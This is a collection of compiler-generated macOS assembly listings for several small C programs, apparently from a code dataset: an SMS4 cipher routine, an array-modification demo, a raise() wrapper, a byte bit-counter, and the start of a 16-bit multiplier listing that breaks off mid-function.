_pData+8(%rip), %rdx movq _pData+16(%rip), %rcx movq _pData+24(%rip), %r8 leaq L_.str(%rip), %rdi movb $0, %al callq _printf callq _SMS4Encrypt1M leaq _pData2(%rip), %rdi movl $72, %esi leaq _ENRK(%rip), %rdx callq _SMS4Encrypt leaq _pData2(%rip), %rdi movl $72, %esi leaq _DERK(%rip), %rdx callq _SMS4Decrypt xorl %eax, %eax popq %rbp retq .cfi_endproc ## -- End function .p2align 4, 0x90 ## -- Begin function SMS4CalciRK _SMS4CalciRK: ## @SMS4CalciRK .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $32, %rsp movq %rdi, -8(%rbp) movq $0, -16(%rbp) movq $0, -24(%rbp) movq -8(%rbp), %rax andq $255, %rax ## kill: def $al killed $al killed $rax movb %al, -25(%rbp) movq -8(%rbp), %rax andq $65280, %rax ## imm = 0xFF00 shrq $8, %rax ## kill: def $al killed $al killed $rax movb %al, -26(%rbp) movq -8(%rbp), %rax andq $16711680, %rax ## imm = 0xFF0000 shrq $16, %rax ## kill: def $al killed $al killed $rax movb %al, -27(%rbp) movabsq $4278190080, %rax ## imm = 0xFF000000 andq -8(%rbp), %rax shrq $24, %rax ## kill: def $al killed $al killed $rax movb %al, -28(%rbp) movzbl -25(%rbp), %edi callq _SMS4Sbox movb %al, -29(%rbp) movzbl -26(%rbp), %edi callq _SMS4Sbox movb %al, -30(%rbp) movzbl -27(%rbp), %edi callq _SMS4Sbox movb %al, -31(%rbp) movzbl -28(%rbp), %edi callq _SMS4Sbox movb %al, -32(%rbp) movzbl -29(%rbp), %eax movzbl -30(%rbp), %ecx shll $8, %ecx orl %ecx, %eax movzbl -31(%rbp), %ecx shll $16, %ecx orl %ecx, %eax movzbl -32(%rbp), %ecx shll $24, %ecx orl %ecx, %eax cltq movq %rax, -16(%rbp) movq -16(%rbp), %rax movq -16(%rbp), %rcx shlq $13, %rcx movq -16(%rbp), %rdx shrq $19, %rdx orq %rdx, %rcx xorq %rcx, %rax movq -16(%rbp), %rcx shlq $23, %rcx movq -16(%rbp), %rdx shrq $9, %rdx orq %rdx, %rcx xorq %rcx, %rax movq %rax, -24(%rbp) movq -24(%rbp), %rax addq $32, %rsp popq %rbp retq .cfi_endproc ## -- End function .p2align 4, 0x90 ## -- Begin function SMS4Sbox _SMS4Sbox: ## @SMS4Sbox .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movb %dil, %al movb %al, -1(%rbp) leaq _SboxTable(%rip), %rax movq %rax, -16(%rbp) movq -16(%rbp), %rax movzbl -1(%rbp), %ecx ## kill: def $rcx killed $ecx movb (%rax,%rcx), %al movb %al, -17(%rbp) movzbl -17(%rbp), %eax popq %rbp retq .cfi_endproc ## -- End function .p2align 4, 0x90 ## -- Begin function SMS4Lt _SMS4Lt: ## @SMS4Lt .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $32, %rsp movq %rdi, -8(%rbp) movq $0, -16(%rbp) movq $0, -24(%rbp) movq -8(%rbp), %rax andq $255, %rax ## kill: def $al killed $al killed $rax movb %al, -25(%rbp) movq -8(%rbp), %rax andq $65280, %rax ## imm = 0xFF00 shrq $8, %rax ## kill: def $al killed $al killed $rax movb %al, -26(%rbp) movq -8(%rbp), %rax andq $16711680, %rax ## imm = 0xFF0000 shrq $16, %rax ## kill: def $al killed $al killed $rax movb %al, -27(%rbp) movabsq $4278190080, %rax ## imm = 0xFF000000 andq -8(%rbp), %rax shrq $24, %rax ## kill: def $al killed $al killed $rax movb %al, -28(%rbp) movzbl -25(%rbp), %edi callq _SMS4Sbox movb %al, -29(%rbp) movzbl -26(%rbp), %edi callq _SMS4Sbox movb %al, -30(%rbp) movzbl -27(%rbp), %edi callq _SMS4Sbox movb %al, -31(%rbp) movzbl -28(%rbp), %edi callq _SMS4Sbox movb %al, -32(%rbp) movzbl -29(%rbp), %eax movzbl -30(%rbp), %ecx shll $8, %ecx orl %ecx, %eax movzbl -31(%rbp), %ecx shll $16, %ecx orl %ecx, %eax movzbl -32(%rbp), %ecx shll $24, %ecx orl %ecx, %eax cltq movq %rax, -16(%rbp) movq -16(%rbp), %rax movq -16(%rbp), %rcx shlq $2, %rcx movq -16(%rbp), %rdx shrq $30, %rdx orq %rdx, %rcx xorq %rcx, %rax movq -16(%rbp), %rcx shlq $10, %rcx movq -16(%rbp), %rdx shrq $22, %rdx orq %rdx, %rcx xorq %rcx, %rax movq -16(%rbp), %rcx shlq $18, %rcx movq -16(%rbp), %rdx shrq $14, %rdx orq %rdx, %rcx xorq %rcx, %rax movq -16(%rbp), %rcx shlq $24, %rcx movq -16(%rbp), %rdx shrq $8, %rdx orq %rdx, %rcx xorq %rcx, %rax movq %rax, -24(%rbp) movq -24(%rbp), %rax addq $32, %rsp popq %rbp retq .cfi_endproc ## -- End function .section __DATA,__data .globl _pData ## @pData .p2align 4 _pData: .quad 19088743 ## 0x1234567 .quad 2309737967 ## 0x89abcdef .quad 4275878552 ## 0xfedcba98 .quad 1985229328 ## 0x76543210 .globl _pData2 ## @pData2 .p2align 4 _pData2: .quad 19088743 ## 0x1234567 .quad 2309737967 ## 0x89abcdef .quad 4275878552 ## 0xfedcba98 .quad 1985229328 ## 0x76543210 .quad 303174162 ## 0x12121212 .quad 875836468 ## 0x34343434 .quad 1448498774 ## 0x56565656 .quad 2021161080 ## 0x78787878 .quad 305402420 ## 0x12341234 .p2align 4 ## @MK _MK: .quad 19088743 ## 0x1234567 .quad 2309737967 ## 0x89abcdef .quad 4275878552 ## 0xfedcba98 .quad 1985229328 ## 0x76543210 .zerofill __DATA,__bss,_ENRK,256,4 ## @ENRK .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "0x%08x, 0x%08x, 0x%08x, 0x%08x. \n" .zerofill __DATA,__bss,_DERK,256,4 ## @DERK .section __DATA,__data .p2align 4 ## @FK _FK: .quad 2746333894 ## 0xa3b1bac6 .quad 1453994832 ## 0x56aa3350 .quad 1736282519 ## 0x677d9197 .quad 2993693404 ## 0xb27022dc .p2align 4 ## @CK _CK: .quad 462357 ## 0x70e15 .quad 472066609 ## 0x1c232a31 .quad 943670861 ## 0x383f464d .quad 1415275113 ## 0x545b6269 .quad 1886879365 ## 0x70777e85 .quad 2358483617 ## 0x8c939aa1 .quad 2830087869 ## 0xa8afb6bd .quad 3301692121 ## 0xc4cbd2d9 .quad 3773296373 ## 0xe0e7eef5 .quad 4228057617 ## 0xfc030a11 .quad 404694573 ## 0x181f262d .quad 876298825 ## 0x343b4249 .quad 1347903077 ## 0x50575e65 .quad 1819507329 ## 0x6c737a81 .quad 2291111581 ## 0x888f969d .quad 2762715833 ## 0xa4abb2b9 .quad 3234320085 ## 0xc0c7ced5 .quad 3705924337 ## 0xdce3eaf1 .quad 4177462797 ## 0xf8ff060d .quad 337322537 ## 0x141b2229 .quad 808926789 ## 0x30373e45 .quad 1280531041 ## 0x4c535a61 .quad 1752135293 ## 0x686f767d .quad 2223739545 ## 0x848b9299 .quad 2695343797 ## 0xa0a7aeb5 .quad 3166948049 ## 0xbcc3cad1 .quad 3638552301 ## 0xd8dfe6ed .quad 4110090761 ## 0xf4fb0209 .quad 269950501 ## 0x10171e25 .quad 741554753 ## 0x2c333a41 .quad 1213159005 ## 0x484f565d .quad 1684763257 ## 0x646b7279 .p2align 4 ## @SboxTable _SboxTable: .ascii "\326\220\351\376\314\341=\267\026\266\024\302(\373,\005" .ascii "+g\232v*\276\004\303\252D\023&I\206\006\231" .ascii "\234BP\364\221\357\230z3T\013C\355\317\254b" .ascii "\344\263\034\251\311\b\350\225\200\337\224\372u\217?\246" .ascii "G\007\247\374\363s\027\272\203Y<\031\346\205O\250" .ascii "hk\201\262qd\332\213\370\353\017KpV\2355" .ascii "\036$\016^cX\321\242%\"|;\001!x\207" .ascii "\324\000FW\237\323'RL6\002\347\240\304\310\236" .ascii "\352\277\212\322@\3078\265\243\367\362\316\371a\025\241" .ascii "\340\256]\244\2334\032U\255\22320\365\214\261\343" .ascii "\035\366\342.\202f\312`\300)#\253\rSNo" .ascii "\325\3337E\336\375\216/\003\377jrml[Q" .ascii "\215\033\257\222\273\335\274\177\021\331\\A\037\020Z\330" .ascii "\n\3011\210\245\315{\275-t\320\022\270\345\264\260" .ascii "\211i\227J\f\226w~e\271\361\t\305n\306\204" .ascii "\030\360}\354:\334M y\356_>\327\3139H" .subsections_via_symbols
the_stack_data/137440.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #48 .cfi_def_cfa_offset 48 stp x29, x30, [sp, #32] ; 16-byte Folded Spill add x29, sp, #32 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 adrp x8, _global_array@GOTPAGE ldr x8, [x8, _global_array@GOTPAGEOFF] str x8, [sp] ; 8-byte Folded Spill stur wzr, [x29, #-4] stur w0, [x29, #-8] str x1, [sp, #16] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _printf ldr x0, [sp] ; 8-byte Folded Reload mov x1, #512 bl _bzero ldr x0, [sp] ; 8-byte Folded Reload bl _dump_array ldur w8, [x29, #-8] mov w10, #2 sdiv w9, w8, w10 mul w9, w9, w10 subs w8, w8, w9 subs w8, w8, #0 cset w8, ne tbnz w8, #0, LBB0_2 b LBB0_1 LBB0_1: adrp x0, l_.str.1@PAGE add x0, x0, l_.str.1@PAGEOFF bl _printf b LBB0_9 LBB0_2: ldur w8, [x29, #-8] subs w8, w8, #0 cset w8, gt tbnz w8, #0, LBB0_4 b LBB0_3 LBB0_3: mov w8, #1 stur w8, [x29, #-8] b LBB0_4 LBB0_4: str wzr, [sp, #12] b LBB0_5 LBB0_5: ; =>This Inner Loop Header: Depth=1 ldr w8, [sp, #12] subs w8, w8, #64 cset w8, ge tbnz w8, #0, LBB0_8 b LBB0_6 LBB0_6: ; in Loop: Header=BB0_5 Depth=1 ldr x8, [sp] ; 8-byte Folded Reload ldursw x10, [x29, #-8] ldrsw x9, [sp, #12] add x9, x8, x9, lsl #3 ldr x8, [x9] add x8, x8, x10 str x8, [x9] b LBB0_7 LBB0_7: ; in Loop: Header=BB0_5 Depth=1 ldur w9, [x29, #-8] ldr w8, [sp, #12] add w8, w8, w9 str w8, [sp, #12] b LBB0_5 LBB0_8: b LBB0_9 LBB0_9: adrp x0, l_.str.2@PAGE add x0, x0, l_.str.2@PAGEOFF bl _printf ldr x0, [sp] ; 8-byte Folded Reload bl _dump_array mov w0, #0 ldp x29, x30, [sp, #32] ; 16-byte Folded Reload add sp, sp, #48 ret .cfi_endproc ; -- End function .p2align 2 ; -- Begin function dump_array _dump_array: ; @dump_array .cfi_startproc ; %bb.0: sub sp, sp, #48 .cfi_def_cfa_offset 48 stp x29, x30, [sp, #32] ; 16-byte Folded Spill add x29, sp, #32 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur x0, [x29, #-8] stur wzr, [x29, #-12] b LBB1_1 LBB1_1: ; =>This Inner Loop Header: Depth=1 ldur w8, [x29, #-12] subs w8, w8, #64 cset w8, ge tbnz w8, #0, LBB1_6 b LBB1_2 LBB1_2: ; in Loop: Header=BB1_1 Depth=1 ldur w8, [x29, #-12] mov w10, #8 sdiv w9, w8, w10 mul w9, w9, w10 subs w8, w8, w9 subs w8, w8, #0 cset w8, ne tbnz w8, #0, LBB1_4 b LBB1_3 LBB1_3: ; in Loop: Header=BB1_1 Depth=1 adrp x0, l_.str.3@PAGE add x0, x0, l_.str.3@PAGEOFF bl _printf b LBB1_4 LBB1_4: ; in Loop: Header=BB1_1 Depth=1 ldur x8, [x29, #-8] ldursw x9, [x29, #-12] ldr x8, [x8, x9, lsl #3] mov x9, sp str x8, [x9] adrp x0, l_.str.4@PAGE add x0, x0, l_.str.4@PAGEOFF bl _printf b LBB1_5 LBB1_5: ; in Loop: Header=BB1_1 Depth=1 ldur w8, [x29, #-12] add w8, w8, #1 stur w8, [x29, #-12] b LBB1_1 LBB1_6: adrp x0, l_.str.3@PAGE add x0, x0, l_.str.3@PAGEOFF bl _printf ldp x29, x30, [sp, #32] ; 16-byte Folded Reload add sp, sp, #48 ret .cfi_endproc ; -- End function .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "Array before modifiction:\n" .comm _global_array,512,3 ; @global_array l_.str.1: ; @.str.1 .asciz "Not adding to variables\n" l_.str.2: ; @.str.2 .asciz "Array after modifiction:\n" l_.str.3: ; @.str.3 .asciz "\n" l_.str.4: ; @.str.4 .asciz "\t0x%llx" .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $32, %rsp movl $0, -4(%rbp) movl %edi, -8(%rbp) movq %rsi, -16(%rbp) leaq L_.str(%rip), %rdi movb $0, %al callq _printf movq _global_array@GOTPCREL(%rip), %rdi xorl %esi, %esi movl $512, %edx ## imm = 0x200 callq _memset movq _global_array@GOTPCREL(%rip), %rdi callq _dump_array movl -8(%rbp), %eax movl $2, %ecx cltd idivl %ecx cmpl $0, %edx jne LBB0_2 ## %bb.1: leaq L_.str.1(%rip), %rdi movb $0, %al callq _printf jmp LBB0_9 LBB0_2: cmpl $0, -8(%rbp) jg LBB0_4 ## %bb.3: movl $1, -8(%rbp) LBB0_4: movl $0, -20(%rbp) LBB0_5: ## =>This Inner Loop Header: Depth=1 cmpl $64, -20(%rbp) jge LBB0_8 ## %bb.6: ## in Loop: Header=BB0_5 Depth=1 movslq -8(%rbp), %rdx movslq -20(%rbp), %rcx movq _global_array@GOTPCREL(%rip), %rax addq (%rax,%rcx,8), %rdx movq _global_array@GOTPCREL(%rip), %rax movq %rdx, (%rax,%rcx,8) ## %bb.7: ## in Loop: Header=BB0_5 Depth=1 movl -8(%rbp), %eax addl -20(%rbp), %eax movl %eax, -20(%rbp) jmp LBB0_5 LBB0_8: jmp LBB0_9 LBB0_9: leaq L_.str.2(%rip), %rdi movb $0, %al callq _printf movq _global_array@GOTPCREL(%rip), %rdi callq _dump_array xorl %eax, %eax addq $32, %rsp popq %rbp retq .cfi_endproc ## -- End function .p2align 4, 0x90 ## -- Begin function dump_array _dump_array: ## @dump_array .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp movq %rdi, -8(%rbp) movl $0, -12(%rbp) LBB1_1: ## =>This Inner Loop Header: Depth=1 cmpl $64, -12(%rbp) jge LBB1_6 ## %bb.2: ## in Loop: Header=BB1_1 Depth=1 movl -12(%rbp), %eax movl $8, %ecx cltd idivl %ecx cmpl $0, %edx jne LBB1_4 ## %bb.3: ## in Loop: Header=BB1_1 Depth=1 leaq L_.str.3(%rip), %rdi movb $0, %al callq _printf LBB1_4: ## in Loop: Header=BB1_1 Depth=1 movq -8(%rbp), %rax movslq -12(%rbp), %rcx movq (%rax,%rcx,8), %rsi leaq L_.str.4(%rip), %rdi movb $0, %al callq _printf ## %bb.5: ## in Loop: Header=BB1_1 Depth=1 movl -12(%rbp), %eax addl $1, %eax movl %eax, -12(%rbp) jmp LBB1_1 LBB1_6: leaq L_.str.3(%rip), %rdi movb $0, %al callq _printf addq $16, %rsp popq %rbp retq .cfi_endproc ## -- End function .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "Array before modifiction:\n" .comm _global_array,512,4 ## @global_array L_.str.1: ## @.str.1 .asciz "Not adding to variables\n" L_.str.2: ## @.str.2 .asciz "Array after modifiction:\n" L_.str.3: ## @.str.3 .asciz "\n" L_.str.4: ## @.str.4 .asciz "\t0x%llx" .subsections_via_symbols
the_stack_data/25137684.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _raise ; -- Begin function raise .p2align 2 _raise: ; @raise .cfi_startproc ; %bb.0: sub sp, sp, #32 .cfi_def_cfa_offset 32 stp x29, x30, [sp, #16] ; 16-byte Folded Spill add x29, sp, #16 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur w0, [x29, #-4] ldur w1, [x29, #-4] mov w0, #0 bl _kill ldp x29, x30, [sp, #16] ; 16-byte Folded Reload add sp, sp, #32 ret .cfi_endproc ; -- End function .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _raise ## -- Begin function raise .p2align 4, 0x90 _raise: ## @raise .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp movl %edi, -4(%rbp) movl -4(%rbp), %esi xorl %edi, %edi callq _kill addq $16, %rsp popq %rbp retq .cfi_endproc ## -- End function .subsections_via_symbols
the_stack_data/182952836.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _initialize_count_bits ; -- Begin function initialize_count_bits .p2align 2 _initialize_count_bits: ; @initialize_count_bits .cfi_startproc ; %bb.0: sub sp, sp, #48 .cfi_def_cfa_offset 48 stp x29, x30, [sp, #32] ; 16-byte Folded Spill add x29, sp, #32 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur wzr, [x29, #-8] b LBB0_1 LBB0_1: ; =>This Loop Header: Depth=1 ; Child Loop BB0_3 Depth 2 ldur w8, [x29, #-8] subs w8, w8, #256 cset w8, ge tbnz w8, #0, LBB0_7 b LBB0_2 LBB0_2: ; in Loop: Header=BB0_1 Depth=1 stur wzr, [x29, #-4] ldur w8, [x29, #-8] stur w8, [x29, #-12] b LBB0_3 LBB0_3: ; Parent Loop BB0_1 Depth=1 ; => This Inner Loop Header: Depth=2 ldur w8, [x29, #-12] subs w8, w8, #0 cset w8, eq tbnz w8, #0, LBB0_5 b LBB0_4 LBB0_4: ; in Loop: Header=BB0_3 Depth=2 ldur w8, [x29, #-12] ldur w9, [x29, #-12] subs w9, w9, #1 and w8, w8, w9 stur w8, [x29, #-12] ldur w8, [x29, #-4] add w8, w8, #1 stur w8, [x29, #-4] b LBB0_3 LBB0_5: ; in Loop: Header=BB0_1 Depth=1 ldur w8, [x29, #-4] ldursw x10, [x29, #-8] adrp x9, _byte_bit_count@PAGE add x9, x9, _byte_bit_count@PAGEOFF strb w8, [x9, x10] ldur w10, [x29, #-8] ; implicit-def: $x8 mov x8, x10 ldursw x10, [x29, #-8] ldrb w10, [x9, x10] mov x9, sp str x8, [x9] ; implicit-def: $x8 mov x8, x10 str x8, [x9, #8] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _printf b LBB0_6 LBB0_6: ; in Loop: Header=BB0_1 Depth=1 ldur w8, [x29, #-8] add w8, w8, #1 stur w8, [x29, #-8] b LBB0_1 LBB0_7: ldp x29, x30, [sp, #32] ; 16-byte Folded Reload add sp, sp, #48 ret .cfi_endproc ; -- End function .globl _count_bits ; -- Begin function count_bits .p2align 2 _count_bits: ; @count_bits .cfi_startproc ; %bb.0: sub sp, sp, #16 .cfi_def_cfa_offset 16 add x8, sp, #12 str w0, [sp, #12] str x8, [sp] ldr x8, [sp] ldrb w8, [x8] ; kill: def $x8 killed $w8 adrp x9, _byte_bit_count@PAGE add x9, x9, _byte_bit_count@PAGEOFF ldrb w8, [x9, x8] ldr x10, [sp] ldrb w10, [x10, #1] ; kill: def $x10 killed $w10 ldrb w10, [x9, x10] add w8, w8, w10 ldr x10, [sp] ldrb w10, [x10, #2] ; kill: def $x10 killed $w10 ldrb w10, [x9, x10] add w8, w8, w10 ldr x10, [sp] ldrb w10, [x10, #3] ; kill: def $x10 killed $w10 ldrb w9, [x9, x10] add w0, w8, w9 add sp, sp, #16 ret .cfi_endproc ; -- End function .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #48 .cfi_def_cfa_offset 48 stp x29, x30, [sp, #32] ; 16-byte Folded Spill add x29, sp, #32 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 mov w8, #0 stur w8, [x29, #-12] ; 4-byte Folded Spill stur wzr, [x29, #-4] bl _initialize_count_bits adrp x0, l_.str.1@PAGE add x0, x0, l_.str.1@PAGEOFF bl _printf mov x9, sp sub x8, x29, #8 str x8, [x9] adrp x0, l_.str.2@PAGE add x0, x0, l_.str.2@PAGEOFF bl _scanf ldur w0, [x29, #-8] bl _count_bits ldur w9, [x29, #-8] ; implicit-def: $x8 mov x8, x9 mov x9, sp ; implicit-def: $x10 mov x10, x0 str x10, [x9] str x8, [x9, #8] adrp x0, l_.str.3@PAGE add x0, x0, l_.str.3@PAGEOFF bl _printf ldur w0, [x29, #-12] ; 4-byte Folded Reload ldp x29, x30, [sp, #32] ; 16-byte Folded Reload add sp, sp, #48 ret .cfi_endproc ; -- End function .zerofill __DATA,__bss,_byte_bit_count,256,0 ; @byte_bit_count .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "%d %d\n" l_.str.1: ; @.str.1 .asciz "Enter a number: " l_.str.2: ; @.str.2 .asciz "%i" l_.str.3: ; @.str.3 .asciz "There are %d bits on in %X\n" .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _initialize_count_bits ## -- Begin function initialize_count_bits .p2align 4, 0x90 _initialize_count_bits: ## @initialize_count_bits .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp movl $0, -8(%rbp) LBB0_1: ## =>This Loop Header: Depth=1 ## Child Loop BB0_3 Depth 2 cmpl $256, -8(%rbp) ## imm = 0x100 jge LBB0_7 ## %bb.2: ## in Loop: Header=BB0_1 Depth=1 movl $0, -4(%rbp) movl -8(%rbp), %eax movl %eax, -12(%rbp) LBB0_3: ## Parent Loop BB0_1 Depth=1 ## => This Inner Loop Header: Depth=2 cmpl $0, -12(%rbp) je LBB0_5 ## %bb.4: ## in Loop: Header=BB0_3 Depth=2 movl -12(%rbp), %eax movl -12(%rbp), %ecx subl $1, %ecx andl %ecx, %eax movl %eax, -12(%rbp) movl -4(%rbp), %eax addl $1, %eax movl %eax, -4(%rbp) jmp LBB0_3 LBB0_5: ## in Loop: Header=BB0_1 Depth=1 movl -4(%rbp), %eax movb %al, %dl movslq -8(%rbp), %rcx leaq _byte_bit_count(%rip), %rax movb %dl, (%rax,%rcx) movl -8(%rbp), %esi movslq -8(%rbp), %rcx leaq _byte_bit_count(%rip), %rax movzbl (%rax,%rcx), %edx leaq L_.str(%rip), %rdi movb $0, %al callq _printf ## %bb.6: ## in Loop: Header=BB0_1 Depth=1 movl -8(%rbp), %eax addl $1, %eax movl %eax, -8(%rbp) jmp LBB0_1 LBB0_7: addq $16, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _count_bits ## -- Begin function count_bits .p2align 4, 0x90 _count_bits: ## @count_bits .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movl %edi, -4(%rbp) leaq -4(%rbp), %rax movq %rax, -16(%rbp) movq -16(%rbp), %rax movzbl (%rax), %eax movl %eax, %ecx leaq _byte_bit_count(%rip), %rax movzbl (%rax,%rcx), %eax movq -16(%rbp), %rcx movzbl 1(%rcx), %ecx movl %ecx, %edx leaq _byte_bit_count(%rip), %rcx movzbl (%rcx,%rdx), %ecx addl %ecx, %eax movq -16(%rbp), %rcx movzbl 2(%rcx), %ecx movl %ecx, %edx leaq _byte_bit_count(%rip), %rcx movzbl (%rcx,%rdx), %ecx addl %ecx, %eax movq -16(%rbp), %rcx movzbl 3(%rcx), %ecx movl %ecx, %edx leaq _byte_bit_count(%rip), %rcx movzbl (%rcx,%rdx), %ecx addl %ecx, %eax popq %rbp retq .cfi_endproc ## -- End function .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp movl $0, -4(%rbp) callq _initialize_count_bits leaq L_.str.1(%rip), %rdi movb $0, %al callq _printf leaq L_.str.2(%rip), %rdi leaq -8(%rbp), %rsi movb $0, %al callq _scanf movl -8(%rbp), %edi callq _count_bits movl %eax, %esi movl -8(%rbp), %edx leaq L_.str.3(%rip), %rdi movb $0, %al callq _printf xorl %eax, %eax addq $16, %rsp popq %rbp retq .cfi_endproc ## -- End function .zerofill __DATA,__bss,_byte_bit_count,256,4 ## @byte_bit_count .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "%d %d\n" L_.str.1: ## @.str.1 .asciz "Enter a number: " L_.str.2: ## @.str.2 .asciz "%i" L_.str.3: ## @.str.3 .asciz "There are %d bits on in %X\n" .subsections_via_symbols
the_stack_data/206394456.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _mul16s_HFZ ; -- Begin function mul16s_HFZ .p2align 2 _mul16s_HFZ: ; @mul16s_HFZ .cfi_startproc ; %bb.0: stp x28, x27, [sp, #-16]! ; 16-byte Folded Spill .cfi_def_cfa_offset 16 .cfi_offset w27, -8 .cfi_offset w28, -16 sub sp, sp, #1248 .cfi_def_cfa_offset 1264 strh w0, [sp, #1246] strh w1, [sp, #1244] strb wzr, [sp, #210] strb wzr, [sp, #1037] strb wzr, [sp, #897] strb wzr, [sp, #464] strb wzr, [sp, #1196] strb wzr, [sp, #906] ldrh w8, [sp, #1244] asr w8, w8, #3 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #3 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #794] ldrh w8, [sp, #1244] asr w8, w8, #14 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #9 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #822] ldrh w8, [sp, #1244] asr w8, w8, #15 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #8 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #826] ldrh w8, [sp, #1244] asr w8, w8, #12 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #11 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #10] ldrh w8, [sp, #1244] asr w8, w8, #11 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #12 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #1238] ldrh w8, [sp, #1244] asr w8, w8, #10 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #13 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #828] ldrh w8, [sp, #1244] asr w8, w8, #9 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #14 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #827] ldrh w8, [sp, #1244] asr w8, w8, #9 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #15 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #290] ldrh w8, [sp, #1244] asr w8, w8, #15 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #9 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #761] ldrh w8, [sp, #1244] asr w8, w8, #14 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #10 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #755] ldrh w8, [sp, #1244] asr w8, w8, #13 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #11 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #141] ldrh w8, [sp, #1244] asr w8, w8, #12 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #12 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #148] ldrh w8, [sp, #1244] asr w8, w8, #11 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #13 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #465] ldrh w8, [sp, #1244] asr w8, w8, #10 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #14 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #466] ldrh w8, [sp, #1244] asr w8, w8, #10 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #15 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #870] ldrh w8, [sp, #1244] asr w8, w8, #5 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #5 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #352] ldrh w8, [sp, #1244] asr w8, w8, #13 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #12 and w9, w9, #0x1 and w8, w8, w9 strb w8, [sp, #104] ldrh w8, [sp, #1244] asr w8, w8, #7 and w8, w8, #0x1 ldrh w9, [sp, #1246] asr w9, w9, #3 and w9, w9, #0x1 and w8, w8, w9 strb 